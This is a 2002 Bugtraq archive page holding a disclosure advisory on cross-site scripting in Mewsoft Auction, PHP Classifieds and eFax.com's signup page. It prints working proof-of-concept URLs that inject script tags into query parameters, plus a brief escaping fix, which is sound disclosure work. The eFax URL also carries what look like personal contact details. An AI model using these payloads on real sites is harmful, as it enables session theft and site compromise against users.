Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Mewsoft Auction, PHP Classifieds and eFax.com - CrossSiteScripting issues

From: § o m e 1 <exe () FlashMail com>
Date: Fri, 14 Jun 2002 21:15:05 +0300
Advisory name: SSI & CSS execution in Mewsoft Auction, PHP Classifieds and
eFax.com
Application: Mewsoft Auction (Perl script), PHP Classifieds (PHP), eFax.com
(ASP)
Date: 14.6.2002
Impact: remote user can execute shell commands & cross site scripting

=====================================


CrossSiteScripting @ Mewsoft Auction Script
<example>
http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search
&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script

&Where=&Sort=Photo&Dir=

</example>

Program Name    : Mewsoft Auction
Program Version : 3.0
Home Page         : http://www.mewsoft.com


=====================================

CrossSiteScripting @ PHP Classifieds
<example>
http://www.xxxx.com/phpclassifieds/latestwap.php?url=<script>alert('OopS');<
/script>
</example>

Program Name    : PHP Classifieds
Program Version : 6.05
Home Page         : http://www.deltascripts.com/phpclassifieds


=====================================

https://www.efax.com/signup/plus/invalid_cc.asp?FirstName=Nadeem&LastName=al
i&OpSys=Win2000&Email=ra3e%5Fe7sas%40hotmail%2Ecom&PIN=9999&referralco
de=&service=OR%2DPortland%2D503%2DP&VID=5&BID=427%2D2379%2D3151&HomePhone=53
02723558&OFFERCODE=EFAX%5FPLUS&orderNumber=43423716&CreditCardType=MC&Credit
CardNumber=:)&expmonth=03&expyear=2003&StreetAddress=10621+Ced
ar+Ave&StreetAddress2=&City=Grass+Valley&MailRegion=CA&PostalCode=95945&Coun
try=United+States&LogoCode=&reorder_amount=&BillingFreq=Anually&startpage=1&
agreed=yes&USCities=OR%2DPortland%2D503%2DP&EurCities=NONE&AsiaCities=NONE&L
atCities=NONE&CCNumberError=<script>alert('OopS');</script>

eFax web site have many CSS, thats was just one example..


Solution: DON'T trust the user, filter every thing ex in PHP:
<?
$input = HTMLSpecialChars($input);
echo "<hr>your input was:<b>$input</b>";
?>

for your Information: CSS can be used SOMETIMES to execute shell commands on
the web server (using SSI, depending on the WebServer Configuretion) , not
only cookies hijack...


§ o m e 1
http://127.0.0.1/
Previous By Date Next
Previous By Thread Next

Current thread: